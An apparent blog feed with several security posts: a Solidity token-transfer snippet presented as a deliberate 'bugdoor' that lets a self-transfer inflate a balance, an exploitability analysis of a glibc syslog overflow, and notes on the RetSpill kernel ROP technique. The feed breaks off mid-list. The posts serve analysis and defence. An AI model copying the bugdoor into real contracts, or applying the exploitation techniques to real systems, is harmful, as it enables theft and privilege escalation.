+<p>Don't forget to put a <code>title</code> for <a href="https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#accessibility_concerns">accessibility's sake</a>.</p>jvoisinTue, 27 Feb 2024 14:45:00 +0100tag:dustri.org,2024-02-27:/b/youtube-video-embedding-harm-reduction.htmlwebA silly "smart" contract bughttps://dustri.org/b/a-silly-smart-contract-bug.html<p>I was idling on a <a href="https://github.com/stypr">friend</a>'s Discord server,
+when he posted a small snippet of code, taken from a <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f/contracts">smart contract</a>
+apparently swapping <a href="https://academy.binance.com/en/articles/what-is-wrapped-ether-weth-and-how-to-wrap-it">WETH</a> to <a href="https://miner.build/">MINER</a>, but who cares, what's
+interesting here is the bug, can you spot it?</p>
+<div class="codehilite"><pre><span></span><code><span class="kt">function</span><span class="w"> </span><span class="nv">_update</span><span class="p">(</span><span class="kt">address</span><span class="w"> </span><span class="nv">from</span><span class="p">,</span><span class="w"> </span><span class="kt">address</span><span class="w"> </span><span class="nv">to</span><span class="p">,</span><span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">value</span><span class="p">,</span><span class="w"> </span><span class="kt">bool</span><span class="w"> </span><span class="nv">mint</span><span class="p">)</span><span class="w"> </span><span class="kt">internal</span><span class="w"> </span>virtual<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">fromBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>from<span class="p">];</span>
+<span class="w"> </span><span class="kt">uint256</span><span class="w"> </span><span class="nv">toBalance</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>_balances<span class="p">[</span>to<span class="p">];</span>
+<span class="w"> </span><span class="kt">if</span><span class="w"> </span><span class="p">(</span>fromBalance<span class="w"> </span><span class="o"><</span><span class="w"> </span>value<span class="p">)</span><span class="w"> </span><span class="p">{</span>
+<span class="w"> </span>revert<span class="w"> </span>ERC20InsufficientBalance<span class="p">(</span>from<span class="p">,</span><span class="w"> </span>fromBalance<span class="p">,</span><span class="w"> </span>value<span class="p">);</span>
+<span class="w"> </span><span class="p">}</span>
+
+<span class="w"> </span>unchecked<span class="w"> </span><span class="p">{</span>
+<span class="w"> </span><span class="c1">// Overflow not possible: value <= fromBalance <= totalSupply.</span>
+<span class="w"> </span>_balances<span class="p">[</span>from<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>fromBalance<span class="w"> </span><span class="o">-</span><span class="w"> </span>value<span class="p">;</span>
+
+<span class="w"> </span><span class="c1">// Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.</span>
+<span class="w"> </span>_balances<span class="p">[</span>to<span class="p">]</span><span class="w"> </span><span class="o">=</span><span class="w"> </span>toBalance<span class="w"> </span><span class="o">+</span><span class="w"> </span>value<span class="p">;</span>
+<span class="w"> </span><span class="p">}</span>
+</code></pre></div>
+
+<p>As a hint, look at <a href="https://app.sentio.xyz/tx/1/0x4b9de8c56c8919e8598181449a3cc02df40435eb641eaec08ecce12d2342237f">this transaction</a>.
+Isn't it a cute bugdoor?</p>
+<p>The snippet is taken from <a href="https://twitter.com/shoucccc/status/1757777764646859121">this tweet</a>,
+giving the issue away. Thanks to <a href="https://github.com/kjsman">Jinseo Kim</a> for holding my hand
+understanding what was going on there.</p>jvoisinFri, 16 Feb 2024 13:30:00 +0100tag:dustri.org,2024-02-16:/b/a-silly-smart-contract-bug.htmlsecurityFixing the /usr/lib/ssl/certs debacle with Alpine Linux on Proxmoxhttps://dustri.org/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.html<p>There are currently some issues with regard to OpenSSL and Alpine Linux on
+Proxmox, tracked as <a href="https://bugzilla.proxmox.com/show_bug.cgi?id=5194">#5194</a> by Proxmox since the 19<sup>th</sup> of January, with some patches sent by
+email (sigh) to fix the issue still waiting to land. The root cause being
+Proxmox setting <code>SSL_CERT_FILE='/usr/lib/ssl/cert.pem'</code> when <code>pct enter</code> is
+used, while on Alpine the <code>cert.pem</code> file is in <code>/etc/ssl/cert.pem</code>.</p>
+<p>In the meantime, here is what the problem looks like (for
+<a href="https://en.wikipedia.org/wiki/Search_engine_optimization">SEO</a>) and how to
+hack around it: </p>
+<div class="codehilite"><pre><span></span><code><span class="go">root@pve ~ pct enter 122</span>
+<span class="gp"># </span>apk<span class="w"> </span>update
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/main: Permission denied</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:80000002:system library:file_open:No such file or directory:providers/implementations/storemgmt/file_store.c:267:calling stat(/usr/lib/ssl/certs)</span>
+<span class="go">48AB2E51FA7F0000:error:0A000086:SSL routines:tls_post_process_server_certificate:certificate verify failed:ssl/statem/statem_clnt.c:1889:</span>
+<span class="go">WARNING: updating and opening https://dl-cdn.alpinelinux.org/alpine/v3.18/community: Permission denied</span>
+<span class="go">4 unavailable, 0 stale; 30 distinct packages available</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve ~ lxc-attach -n 122 </span>
+<span class="gp"># </span>apk<span class="w"> </span>update<span class="p">;</span><span class="w"> </span>apk<span class="w"> </span>upgrade
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/main/x86_64/APKINDEX.tar.gz</span>
+<span class="go">fetch https://dl-cdn.alpinelinux.org/alpine/v3.18/community/x86_64/APKINDEX.tar.gz</span>
+<span class="go">v3.18.6-10-g1bb71e18dfb [https://dl-cdn.alpinelinux.org/alpine/v3.18/main]</span>
+<span class="go">v3.18.6-9-g41de282e84d [https://dl-cdn.alpinelinux.org/alpine/v3.18/community]</span>
+<span class="go">OK: 20069 distinct packages available</span>
+<span class="go">OK: 10 MiB in 30 packages</span>
+<span class="gp"># </span>^D
+<span class="go">root@pve 16:58 ~ </span>
+</code></pre></div>
+
+<p>tl;dr: <code>lxc-attach -n 123</code> instead of <code>pct enter 123</code></p>jvoisinMon, 05 Feb 2024 17:00:00 +0100tag:dustri.org,2024-02-05:/b/fixing-the-usrlibsslcerts-debacle-with-alpine-linux-on-proxmox.htmlsysadminMusings on CVE-2023-6246 on hardened_mallochttps://dustri.org/b/musings-on-cve-2023-6246-on-hardened_malloc.html<p>Qualys' <s>security team</s> Threat Research Unit <a href="https://seclists.org/oss-sec/2024/q1/68">published</a>
+a couple of hours ago a linear two-step heap buffer overflow in glibc's
+<code>syslog()</code>:</p>
+<div class="codehilite"><pre><span></span><code><span class="mi">206</span><span class="w"> </span><span class="n">buf</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">malloc</span><span class="w"> </span><span class="p">((</span><span class="n">bufsize</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="w"> </span><span class="k">sizeof</span><span class="w"> </span><span class="p">(</span><span class="kt">char</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">213</span><span class="w"> </span><span class="n">__snprintf</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="p">,</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span>
+<span class="mi">214</span><span class="w"> </span><span class="n">SYSLOG_HEADER</span><span class="w"> </span><span class="p">(</span><span class="n">pri</span><span class="p">,</span><span class="w"> </span><span class="n">timestamp</span><span class="p">,</span><span class="w"> </span><span class="o">&</span><span class="n">msgoff</span><span class="p">,</span><span class="w"> </span><span class="n">pid</span><span class="p">));</span>
+<span class="p">...</span>
+<span class="mi">221</span><span class="w"> </span><span class="n">__vsnprintf_internal</span><span class="w"> </span><span class="p">(</span><span class="n">buf</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="n">l</span><span class="p">,</span><span class="w"> </span><span class="n">bufsize</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="n">l</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fmt</span><span class="p">,</span><span class="w"> </span><span class="n">apc</span><span class="p">,</span>
+<span class="mi">222</span><span class="w"> </span><span class="n">mode_flags</span><span class="p">);</span>
+</code></pre></div>
+
+<p>the tl;dr is that <code>bufsize</code> is <code>0</code> while <code>l</code> is user-controlled.
+As mentioned in the advisory, messing with nss structures as done
+in their (phenomenal) <a href="https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt"><code>Baron Samedit</code> sudo
+exploit</a>
+is a good way to get a root shell on the glibc.</p>
+<p>While the bug is in glibc's <code>syslog</code>, it's not unheard of for
+people to run custom allocators for performance/security/speed/… reasons.
+One of those could be, for example, <a href="https://github.com/GrapheneOS/hardened_malloc">hardened_malloc</a>,
+<a href="https://grapheneos.org">GrapheneOS</a>'s security-focused allocator, raising
+the question "would <code>hardened_malloc</code> make this particular bug
+unexploitable on my x86_64 Debian machine?"</p>
+<p>After discussing this with friends, we don't <em>think</em> that it makes
+the bug completely unexploitable, but ridiculously complicated, which is good
+enough™ for me. But keep in mind that this "analysis" was done hastily at 2am,
+so caveat lector.</p>
+<p><code>hardened_malloc</code> uses size-based slabs isolation, popularised by
+<a href="https://chromium.googlesource.com/chromium/src/+/master/base/allocator/partition_allocator/PartitionAlloc.md">PartitionAlloc</a>.
+Since <code>bufsize</code> is zero, this is a 1-byte
+allocation, falling into the
+<a href="https://github.com/GrapheneOS/hardened_malloc/blob/main/h_malloc.c#L147">16 bytes size-class</a>,
+the smallest after the special <code>0</code> one. So to exploit this, one would have to find an
+interesting object of size 16 bytes or lower to overwrite. But since
+canaries are enabled by default, this becomes even more difficult: sizes of
+allocations are actually bumped by 8 bytes, meaning that one would actually
+have to find an interesting object of size 8 bytes or lower.</p>
+<p>Moreover, 16-byte slabs can contain at most 256 allocations, and are
+surrounded by guard pages, meaning that accessing anything below <code>buf</code> and
+above <code>buf+(256*16)</code> will result in a crash.</p>
+<p>Allocations are randomized, which might help for bruteforcing the heap layout:
+if the current one isn't exploitable, just crash and start again. But it will
+also result in a lot more crashes, since <code>buf</code> might be allocated closer to
+the guard page.</p>
+<p>There are of course other mitigations, but they aren't relevant in this
+particular case, like canaries that are checked on <code>free</code>,
+or <a href="https://community.arm.com/arm-community-blogs/b/architectures-and-processors-blog/posts/enhanced-security-through-mte">ARM's MTE</a> that completely kills linear-overflows.</p>
+<p>Given the ludicrous amount of randomization <code>hardened_malloc</code> applies to heap bases (32G
+per region), bruteforcing offsets of anything not on the heap is futile.
+So one would have to find something interesting in an object of 8 bytes or less on
+the heap, like a path to corrupt as in <code>service_user</code>,
+or some partial-overwrite of a function-pointer to call a
+<a href="https://david942j.blogspot.com/2017/02/project-one-gadget-in-glibc.html">one-shot-gadget</a>, …</p>
+<p>Thanks to <code>strcat</code> for the handholding, and
+to <code>jdoe</code>, <code>drvink</code> and <code>J</code> for their diligent proofreading,</p>jvoisinWed, 31 Jan 2024 02:00:00 +0100tag:dustri.org,2024-01-31:/b/musings-on-cve-2023-6246-on-hardened_malloc.htmlsecurityPaper notes: RetSpillhttps://dustri.org/b/paper-notes-retspill.html<ul>
+<li>Full title: RetSpill: Igniting User-Controlled Data to Burn Away Linux Kernel Protections</li>
+<li>PDF: <a href="https://dl.acm.org/doi/10.1145/3576915.3623220">ACM</a> —
+ <a href="https://kylebot.net/papers/retspill.pdf">mirror</a> —
+ <a href="https://dustri.org/b/files/papers/retspill.pdf">local mirror</a></li>
+<li>Authors: <a href="https://kylebot.net/">Kyle "kylebot" Zeng</a>,
+ <a href="https://ruoyuwang.me/">Ruoyu Wang</a>,
+ <a href="https://yancomm.net/">Yan Shoshitaishvili</a>,
+ and <a href="https://adamdoupe.com/">Adam Doupé</a> from <a href="https://shellphish.net/">Shellphish</a>,
+ along with <a href="https://zplin.me/">Zhenpeng Lin</a>,
+ <a href="https://www-users.cse.umn.edu/~kjlu/">Kangjie Lu</a>,
+ <a href="http://xinyuxing.org/">Xinyu Xing</a> and
+ <a href="https://www.tiffanybao.com/">Tiffany Bao</a>.</li>
+</ul>
+<p>The idea of the paper is to use user-controlled data that are by design copied
+in kernel-land when exercising syscalls to store a <a href="https://en.wikipedia.org/wiki/Return-oriented_programming">ROP</a>-chain, via 4 main venues:</p>
+<ul>
+<li>Valid Data directly copied onto the kernel stack for performance reasons, like when
+ calling <code>poll</code>;</li>
+<li>Preserved Registers, restored upon returning from kernel-land to
+ userland. </li>
+<li>Calling Convention compliant functions will save/restore registers, and
+ apparently, system call handlers are calling convention compliant
+ even though the kernel is already taking care of those,
+ and syscalls can <a href="https://www.kernel.org/doc/html/latest/process/adding-syscalls.html?highlight=syscall_define#do-not-call-system-calls-in-the-kernel">only be called from userland</a>.
+ But even if the syscall handlers weren't compliant, registers still contain
+ userland values when they're called, and sub-functions might store/restore
+ those registers, since those do need to be compliant.</li>
+<li>Uninitialized Memory, since the per-thread kernel stack is reused between syscalls,
+ and not erased (unless <code>PAX_MEMORY_STACKLEAK</code> is used).</li>
+</ul>
+<p>Then, only a <a href="https://en.wikipedia.org/wiki/KASLR">KASLR</a> leak,
+a CFHP (control-flow hijacking primitive)
+and a <code>add rsp, X; ret</code>-like gadget are required to <a href="https://www.youtube.com/watch?v=FoUWHfh733Y">ROP all the things</a>.
+Nowadays, most™ CFHP are created by corrupting the heap to hijack function
+pointers, and since every kernel thread shares the same heap,
+once it is properly shaped, the control flow hijacking primitive can likely
+be triggered again and again from different threads.
+Moreover, changing the exploit is simply a matter of re-invoking a syscall with
+different data spill, instead of having to reshape the heap every single time.
+One doesn't have to worry about crashes (enabling lame bruteforcing), since no
+major Linux distribution (except CentOS, kudos) has <code>panic_on_oops</code> enabled,
+so having a ROP-chain crash is no big deal, because the CFHP is still on the
+heap, one syscall away.</p>
+<p>Since the space afforded to store gadgets might be too small, one trick is to
+invoke <code>do_task_dead</code> at the end of every ROP-chain to terminate it gracefully,
+and trigger the CFHP again and again.</p>
+<p>Mitigation-wise: </p>
+<ul>
+<li><a href="https://en.wikipedia.org/wiki/Control_register#SMEP">SMEP</a>,
+ <a href="https://en.wikipedia.org/wiki/Supervisor_Mode_Access_Prevention">SMAP</a> and
+ <a href="https://en.wikipedia.org/wiki/Kernel_page-table_isolation">KPTI</a> are irrelevant.</li>
+<li><a href="https://pax.grsecurity.net/docs/randkstack.txt">RANDKSTACK</a> mitigates data spillage from Preserved Registers and Uninitialized Memory,
+ but since it only provides 5 bits of randomness, a <code>ret</code>-sled is enough
+ to bypass it (25.44% of the time if using gadgets from Preserved Registers or Uninitialized Memory, 100% otherwise),
+ and in the absence of <code>panic_on_oops</code> it can quickly be bruteforced anyway.</li>
+<li><a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Sanitize_kernel_stack">STACKLEAK</a>,
+ <a href="https://en.wikibooks.org/wiki/Grsecurity/Appendix/Grsecurity_and_PaX_Configuration_Options#Forcibly_initialize_local_variables_copied_to_userland">STRUCTLEAK</a>,
+ and <a href="https://lwn.net/Articles/823152/">CONFIG_INIT_STACK_*</a>
+ only mitigate data spillage from Uninitialized Memory.</li>
+<li><a href="https://lwn.net/Articles/824307/">FG-KASLR</a> is <a href="https://lkmidas.github.io/posts/20210205-linux-kernel-pwn-part-3/#gathering-useful-gadgets">useless</a>
+ since it doesn't randomize everything, leaving a couple (<code>42631</code> according to
+ the paper) of gadgets at position-invariant positions, which are enough to perform
+ arbitrary-reads and derandomize everything.</li>
+<li><a href="https://lore.kernel.org/lkml/202210010918.4918F847C4@keescook/T/#u">KCFI</a>
+ and <a href="https://www.intel.com/content/www/us/en/developer/articles/technical/technical-look-control-flow-enforcement-technology.html">IBT</a>
+ also (currently) don't cover everything, but don't really matter much here
+ anyway, since we only care about backward-edges, and as for the CFHP:</li>
+<li>There <a href="https://i.blackhat.com/USA-22/Wednesday/US-22-Jin-Monitoring-Surveillance-Vendors.pdf#page=35">are ways</a>
+ to obtain one in the presence of perfect forward-edge CFI with a heap corruption.</li>
+<li>Using <code>__x86_indirect_thunk_rdi</code> allows transforming a forward-edge control-flow transition into a backward-edge one.</li>
+<li>Shadow stack and perfect CFI are a pipe dream that would mitigate RetSpill,
+ but <a href="https://pax.grsecurity.net/docs/PaXTeam-H2HC15-RAP-RIP-ROP.pdf">PaX' RAP</a>
+ is really close to it, likely making it insanely hard, with its type-based
+ CFI, and its changing-on-every-syscall/task/… register-stored cookie paired
+ with unreadable kernel stacks for backward edge, on top of CFI.</li>
+</ul>
+<p>To showcase how cool all of this is, the paper comes with a semi-automated tool
+outputting the address of a stack-shifting gadget, a function to perform data
+spillage, invoke the triggering system call, and yield a root shell via a
+classic <code>commit_creds(init_cred)</code> + returning back to user space. It works by:</p>
+<ul>
+<li>taking full snapshots of a vm to locate the syscall leading to CFHP by using
+ a binary-search-like heuristic;</li>
+<li>mutating userland inputs (registers, <code>copy\_from\_user</code>/<code>get\_user</code>
+ parameters, …), continuing the execution of the vm,
+ marking them as user-controllable data if the CFHP still
+ happens after modifications, and doing taint analysis to find how to modify
+ them.</li>
+<li>generating a ROP-chain, which isn't that easy, given that:</li>
+<li>it's done over discrete controlled regions</li>
+<li>there are some constraints, like "<code>eax</code> contains the syscall number",
+ or "<code>edx</code> comes from both <em>Saved Registers</em> and <em>Calling Convention</em>
+ spillages".</li>
+</ul>
+<p>Of course, given that some authors are <a href="https://angr.io/">angr</a> developers,
+<a href="https://github.com/angr/angrop">angrop</a> was used to knit the ROP-chains, and
+the results are pretty impressive:</p>
+<blockquote>
+<p>The abundance of data spillage allows 20 out of 22 proof-of-concept programs
+that manifest CFHP to be semi-automatically turned into full privilege escalation exploits.</p>
+</blockquote>
+<p>To kill this technique, the authors suggest:</p>
+<ol>
+<li><em>Preserved Register</em>: <code>RANDKSTACK</code> helps, but storing userspace registers
+ somewhere else than on the stack would be even better, eg. in <code>task_struct</code>.</li>
+<li><em>Uninitialized Memory</em>: enable <code>STACKLEAK</code>/<code>STRUCTLEAK</code>/<code>CONFIG\_INIT\_STACK\_\*</code>,
+ but the performance impact is pretty steep.</li>
+<li><em>Calling Convention</em> and <em>Valid Data</em>: an improved version of <code>RANDKSTACK</code>,
+ adding a random offset at the bottom of each stack frame, between <code>rsp</code> and user data.
+ This technique also mitigates Preserved Registers and Uninitialized Memory,
+ with an average performance overhead of 0.61%.</li>
+</ol>
+<p>Like all good papers it comes <a href="https://github.com/sefcom/RetSpill">with code</a>.</p>
+<p>Amusingly:</p>
+<ul>
+<li>RetSpill completely bypasses OpenBSD's
+ <a href="https://isopenbsdsecu.re/mitigations/map_stack/">MAP_STACK</a> mitigation,
+ should it ever be implemented in kernel-land, </li>
+<li>The <a href="https://org.anize.rs/">Organizers</a> CTF team
+ <a href="https://org.anize.rs/0CTF-2021-finals/pwn/kernote">used</a>
+ the <a href="https://elixir.bootlin.com/linux/latest/ident/pt_regs"><code>ptregs</code></a> structure
+ to store their ROP chain for <a href="https://ctftime.org/event/1357">0CTF/TCTF 2021
+ Finals</a>'s
+ <a href="https://ctftime.org/task/17461">Kernote</a> pwn challenge.</li>
+</ul>jvoisinThu, 18 Jan 2024 16:45:00 +0100tag:dustri.org,2024-01-18:/b/paper-notes-retspill.htmlpaper_notesOn non-technical video-games cheat mitigationshttps://dustri.org/b/on-non-technical-video-games-cheat-mitigations.html<p>Cheats are as old as video games, and will be there as long. There
+are a couple of high-profile players in the anti-cheat market today:
+<a href="https://en.wikipedia.org/wiki/BattlEye">BattlEye</a>,
+<a href="https://en.wikipedia.org/wiki/Valve_Anti-Cheat">Valve's VAC</a>,
+<a href="https://en.wikipedia.org/wiki/PunkBuster">PunkBuster</a>,
+<a href="https://easy.ac/en-us/">Epic's EAC</a>,
+<a href="https://wowpedia.fandom.com/wiki/Warden_(software)">Blizzard's Warden</a>,
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/360046160933-What-is-Vanguard-">Riot's Vanguard</a>,
+<a href="https://callofduty.com/en/warzone/ricochet">Activision's Ricochet</a>,
+… as well as in-house ones.</p>
+<p>To try to keep up in the race, both sides are resorting to more and more invasive
+technical privacy-invasive measures: streaming virtualised shellcodes,
+hardware fingerprinting and locking,
+<a href="https://secret.club/2020/01/05/battleye-stack-walking.html">stack-walking</a>,
+bootkit-like kernel drivers,
+<a href="https://en.wikipedia.org/wiki/Trusted_Platform_Module">TPM</a>/
+secure boot/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/drivers/bringup/device-guard-and-credential-guard">HVCI</a>/
+<a href="https://en.wikipedia.org/wiki/Input%E2%80%93output_memory_management_unit">IOMMU</a>/
+<a href="https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/oem-vbs">VBS</a>/…
+<a href="https://support-valorant.riotgames.com/hc/en-us/articles/22291331362067-Vanguard-Restrictions">shenanigans</a>,
+hypervisors <a href="https://secret.club/2020/04/13/how-anti-cheats-detect-system-emulation.html">detection</a>/usage,
+<a href="https://secret.club/2020/03/31/battleye-developer-tracking.html">exfiltration of suspicious materials</a>,
+external <a href="https://en.wikipedia.org/wiki/Direct_memory_access">DMA</a> hardware,
+or other <a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">more exotic things</a>.</p>
+<p>Yet anti-cheats are still routinely bypassed, less in a public manner, granted, but private
+and closed-community cheats are still flourishing, since it's a losing game by
+nature. And since games and anti-cheats are software, they're of course riddled
+with <a href="https://vice.com/en/article/d7y5wj/street-fighter-v-rootkit">hilarious</a> bugs leading to
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/614682-eac-dll-loading-method-eac-forcer.html">stupid</a>
+<a href="https://unknowncheats.me/forum/anti-cheat-bypass/503052-easy-anti-cheat-kernel-packet-fucker.html">bypasses</a>.</p>
+<p>But this isn't what this blogpost is about. Nowadays, cheats are considered as
+part of a larger problem: abuses and toxicity. Cheats aren't (only) hunted down
+because they're morally questionable, but because they disturb the way the game is meant to be
+enjoyed. Toxic and abusive behaviours lead to the very same results:
+A game that isn't fun to play because of cheating/abuse/toxicity issues will see its
+player numbers decrease, have poor reviews, … and won't make money. I'm sure
+there is a parallel to be made about the current state of our society, but I
+digress.</p>
+<p>For this article, we'll consider cheating and abuse/toxicity
+as a single issue under the term <em>abuse</em>.
+Now, because abuse isn't a purely technical issue, but also a social one, it
+can't be solved by technical solutions only, so let's have
+a look at what non-technical mitigations game developers are
+coming up with to curb this issue.</p>
+<p>The most obvious mitigation is to make cheating expensive, money wise.
+Having to pay 60EUR for a game is a steep investment, especially if one
+has to buy it again every time they get banned. This of course doesn't
+apply for free-to-play games, but can be emulated by having a cosmetics
+ecosystem, either to pay for, or to grind. The other expensive thing when
+playing video games is the hardware, and bans can be tied to it.</p>
+<h2>Global measures</h2>
+<p>The <em>big</em> mitigation at this level is reputation systems. They're based on
+people who know best how a fun and fair game should go: players. After a
+match, they're encouraged to cast votes on how fair it was, on a match level,
+but also directly at players level: "Bob was really looking out for others",
+"Bob was a team player", and so on. For negative behaviour, reports don't have
+to wait for the end of the match, players can report
+cheating, being offensive in the text/voice chat, <a href="https://en.wikipedia.org/wiki/Griefer">griefing</a>,
+queue dodging, <a href="https://www.urbandictionary.com/define.php?term=smurfing">smurfing</a>, …
+Of course, slanderous reports are penalised.</p>
+<p>Peer pressure is a good lever too, by taking action not only against cheaters,
+but also against people benefiting from the cheat, like regular teammates.</p>
+<p><a href="https://en.wikipedia.org/wiki/Bug_bounty_program">Bug bounty programs</a> are now commonplace,
+so it's only logical that there are now <a href="https://hackerone.com/riot">some</a>
+rewarding anti-cheat bypasses/exploits. The rewards are a bit cheap for now,
+but will likely rise up as the programs mature. The positive effects are
+multiple:</p>
+<ol>
+<li>It increases the incentives to report issues to get them fixed: a player
+ finding a glitch/exploit can now get some cash for the discovery</li>
+<li>As more abuse vectors are killed, the reward prices will rise, and it might
+ become more profitable to report bugs than to sell them to cheat providers.
+ This isn't unheard of, with <a href="https://google.github.io/security-research/kernelctf/rules.html">Google's
+ kernelCTF</a>
+ paying two times more than Zerodium.</li>
+<li>If the bug bounty program is correctly managed, the probability of getting a
+ given amount of money for reporting an issue will be higher than using it in
+ a cheat for an unknown period of time until it gets fixed.</li>
+<li>It will likely increase the amount of people looking for issues and willing
+ to report them.</li>
+</ol>
+<p>Community managers can also regularly <s>spread <a href="https://en.wikipedia.org/wiki/Fear,_uncertainty,_and_doubt">FUD</a></s>
+post updates about ban waves, anti-cheat measures, reports, … to make it
+clear that abusive behaviours are something being taken care of,
+and a dangerous gamble for players to take part in. I think
+I have seen some people spending time proving that some cheaters streaming live
+were in fact recycling pre-recorded footage from an earlier version of the game,
+because some of the game details have been updated in the meantime.</p>
+<h2>Accounts-level measures</h2>
+<p>Some game stores, like <a href="https://en.wikipedia.org/wiki/Steam_(service)">Steam</a>,
+have an account-level "cheater" mark, meaning that if someone gets banned from a game for cheating,
+other games can know about it. But more importantly,
+<a href="https://en.wikipedia.org/wiki/Achievement_(video_games)">achievements</a>
+and cosmetics are also tied to an account, and as mentioned previously,
+those are non-zero time and/or money investments. Getting banned means losing
+them. This of course only deters opportunistic cheaters,
+as people can simply create other accounts to cheat, but this can be made
+harder via purely technical means.</p>
+<p>Most <em>competitive</em> online games have ranked and casual game modes, with the
+former being only accessible after having spent a certain amount of time in the
+latter one. Meaning that one has to do it again every time they get banned,
+or <a href="https://en.wikipedia.org/wiki/Boosting_(video_games)">pay someone to do it</a>.
+Some studios are even making players go through more hoops to be able to play, like requiring
+<a href="https://en.wikipedia.org/wiki/Multi-factor_authentication">MFA</a>,
+or playing a couple of matches against <a href="https://en.wikipedia.org/wiki/Video_game_bot">bots</a>
+branded as a tutorial, before being able to play with other people. There is of
+course a fine balance to keep to annoy abusers but not legitimate players.</p>
+<h2>Player-level measures</h2>
+<p>The goal of non-technical measures isn't to make it impossible to be abusive,
+but to make it not worth it. Moreover, issuing instahwpermabans to <a href="https://en.wikipedia.org/wiki/Edgelord">edgelords</a>
+seems a tad heavy-handed, so having a large panel of measures against abusers makes sense:
+one might want to allow people to rectify their behaviour, to isolate them to
+cool down, and so on. It might include textual warnings, temporary bans, kick
+from the current game, chat/voice mute, losing access to ranked play,
+reducing the amount of earned experience points, …</p>
+<p>Players are abusive for various reasons, but I'd argue that most do because
+it's fun. Ruining the fun for them is thus a good way to curb such behaviours.
+A simple way to do this is to make them play together, by grouping players
+by reputation, or by having servers with technical anti-cheat measures
+explicitly disabled. But there are even more creative measures,
+like <a href="https://www.callofduty.com/en/blog/2023/11/call-of-duty-ricochet-anti-cheat-modern-warfare-III-progress-report">disabling their parachute</a>,
+reducing their damage output to ridiculous levels, taking away their weapons,
+<a href="https://www.callofduty.com/blog/2023/06/call-of-duty-ricochet-anti-cheat-season-04-update">making other legitimate players invisible to them</a>,
+randomly drop some of their inputs,
+<a href="https://dustri.org/b/paper-notes-reversing-anti-cheats-detection-generation-cycle-with-configurable-hallucinations.html">hallucinations</a>, … and
+while this costs a bit more engineering time than simply grouping them
+together, it has a couple of high-value returns on investment:
+- allowing game developers to spend more time collecting data on how cheats are working on a technical level,
+- reducing the impact cheaters have on a game makes it possible to
+ significantly defer banning them without impacting other players too much,
+ making it harder for cheat makers to pinpoint how and why a cheat was
+ detected.
+- it's absolutely hilarious</p>
+<h2>Examples</h2>
+<h3><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six Siege</a></h3>
+<ul>
+<li>It uses BattlEye, and in end-2022 early 2023 banned around
+ <a href="https://ubisoft.com/en-us/game/rainbow-six/siege/news-updates/2g7hT2NNuOqrj35RfgsFxN/anticheat-status-update-march-2023">5000</a>
+ accounts per month, which is a lot, but also shows that it doesn't deter
+ cheaters.</li>
+<li>The game costs <a href="https://store.steampowered.com/app/359550/Tom_Clancys_Rainbow_Six_Siege/">$8</a>,
+ but if you want to have access to all the operators, it's $70. One can also
+ unlock operators by playing, which takes several hundreds of hours.</li>
